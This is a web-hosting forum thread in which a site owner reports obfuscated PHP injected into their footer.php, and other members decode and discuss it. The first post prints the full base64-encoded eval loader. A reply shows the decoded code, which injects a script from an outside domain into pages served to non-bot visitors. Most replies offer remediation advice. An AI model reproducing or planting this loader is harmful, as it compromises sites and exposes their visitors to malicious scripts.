Results 1 to 19 of 19
  1. #1

    my site hacked by following php code

    some hacker insert the following code to my footer.php
    and AVG tell me that threat. Thanks AVG.
    Code:
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
    AVG tell me the threat:
    http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D

    I find that code and deleted it from my file. But I don't know how the hacker insert to my php file?

    Thanks,
    Lei
    Last edited by bear; 05-07-2010 at 09:55 AM.

  2. #2
    Join Date
    Oct 2009
    Posts
    865
    Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.

    Just for fun, here's that chunk decoded and cleaned up somewhat.

    Code:
    if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    	$GLOBALS['mr_no']=1;
    
    	if(!function_exists('mrobh')) {
    		if(!function_exists('gml')) {
    		 function gml() {
    		  if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
    		   return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
    		  }
    
    		  return "";
    		 }
    		}
    
    		if(!function_exists('gzdecode')) {
    		 function gzdecode($var1) {
    		  $var3=@ord(@substr($var1,3,1));
    		  $var2=10;
    
    		  if($var3&4) {
    		   $var4=@unpack('v',substr($var1,10,2));
    		   $var4=$var4[1];
    		   $var2+=2+$var4;
    		  }
    
    		  if($var3&8) {
    		   $var2=@strpos($var1,chr(0),$var2)+1;
    		  }
    
    		  if($var3&16) {
    		   $var2=@strpos($var1,chr(0),$var2)+1;
    		  }
    
    		  if($var3&2) {
    		   $var2+=2;
    		  }
    
    		  $var5=@gzinflate(@substr($var1,$var2));
    
    		  if($var5===FALSE) {
    		   $var5=$var1;
    		  }
    
    		  return $var5;
    		 }
    		}
    
    		function mrobh($var6) {
    		 Header('Content-Encoding: none');
    		 $var7=gzdecode($var6);
    
    		 if(preg_match('/\<\/body/si',$var7)) {
    		  return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
    		 } else {
    		  return $var7.gml();
    		 }
    		}
    
    		ob_start('mrobh');
    	}
    }
    It's basically using an output buffer to capture the generated page, then injects an external script before the <body> tag.

  3. #3
    Lei,

    Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.

    Garret

  4. #4
    I'm sure there are several approached to getting this done, I'm no expert in this, but one of my "clients" had this problem and each time he removed it it was back the next day.
    It turned out that when I went over his folders and files and set the correct permissions the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod

  5. #5
    Join Date
    Nov 2005
    Posts
    282
    chmod is only protecting files from being modified by whatever method is being used. it isnt actually plugging the security vunerability that allowed it in the first place. Also chmod wont help you if your script is vunerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.

    Ideally shared hosting enviroments should not allow users to modify other files on the server outside of their root path, if this is not the case trouble your host to correct it. If they arnt locked out of other users directories it will be possible for them to do possibly more things than inject a snippit of code into a php script, including obtaining usernames and passwords to your database stored in plaintext configuration files.

  6. #6
    Thank you for clearing that up...

  7. #7
    The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.

  8. #8

  9. #9
    Join Date
    Oct 2009
    Posts
    865
    chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.

    It's a jungle out there.

  10. #10
    Join Date
    May 2010
    Location
    Online
    Posts
    236
    Samething happened for one of my clients , each file of his wordpress instalaltion got that dumb in side at the begining , we found a php script that clean up all files and also remove empty lines
    tutorialsbay.com/wordpress-hacked-malware-redirect/

  11. #11
    Possibly a PHP Shell?

  12. #12
    I think this is weak security of file manager or picture manager plugins in wysiwyg editors like TinyMCE
    here is our case in old Mambo CMS installation
    lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  13. #13
    Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.

  14. #14
    The people who create this code and hack it onto people's site are the most despicable of all internet criminals.

    I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.

    Their script finds every PHP file and prepends a chunk of PHP.

    So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.

    HTML Code:
    <?php
    
    # this file should be less than 570 chars in length
    
    $expected=570; 
    
    $data=file_get_contents(__FILE__);
    
    //echo strlen($data);
    
    if (strlen($data)>$expected)
    {
    	//mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail');
    	if (!file_exists('index.phpx')) rename('index.php','index.phpx');
    	// write this despite the existance of index.phpx in case they strike again
    	$fh = fopen('index.php', 'w') or die("can't open file");
    	fwrite($fh, 'Sorry, we are currently offline');
    	fclose($fh);
    }
    
    
    ?>

  15. #15
    Join Date
    Aug 2009
    Location
    United Kingdom
    Posts
    388
    You can infect every page on a website with a PHP shell if they haven't secured PHP

  16. #16
    as long as it also infects this one that's what I'm counting on.

  17. #17
    Join Date
    Oct 2004
    Location
    Złocieniec, Poland
    Posts
    191
    Quote Originally Posted by mobic View Post
    It turned out that when I went over his folders and files and set the correct permissions the problem stopped.
    chmod is weak one may put php file to use php chmod function, it might be also changed by ftp
    better solution is to use "chattr +i" but u need shell access or... php shell (if your hosting provider allows for exec(), system() etc...)

    beside who ever heard of chattr? no one? so haxorz wannabe dont know about it too
    www.goscinnawies.pl - family business, small travel agency in Poland

  18. #18
    Join Date
    Jul 2008
    Posts
    468
    In response to OP:

    This usually occurs because a computer that had FTP/cPanel access to the account picked up some malware which took stored credentials either from Firefox, IT, etc... or from popular FTP software password storage files (such as Filezilla's unencrypted password store) and used that to insert the code.

    You should download MBAM (google it) and Avast/AVG/PrevX/etc and run them in full on any machine that has been compromised.

    Then (and only then), clean the account and reset the password to something new.

  19. #19

Similar Threads

  1. Hacked; Warning: count.php?o=2 code
    By mifbody in forum Hosting Security and Technology
    Replies: 30
    Last Post: 07-31-2008, 06:50 AM
  2. How to show HTML and PHP code on a site?
    By Eiolon in forum Programming Discussion
    Replies: 11
    Last Post: 10-18-2007, 09:20 AM
  3. Site Hacked via php script placed in WordPress Uploads directory
    By cnymike in forum Hosting Security and Technology
    Replies: 8
    Last Post: 04-08-2007, 08:38 AM
  4. PHP/MYSQL Trivia site code job
    By mrsam in forum Employment / Job Offers
    Replies: 2
    Last Post: 11-26-2005, 03:30 PM
  5. Code my Teen Site in PHP and MYSQL.
    By TeenGab.com in forum Employment / Job Offers
    Replies: 3
    Last Post: 08-22-2005, 04:27 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •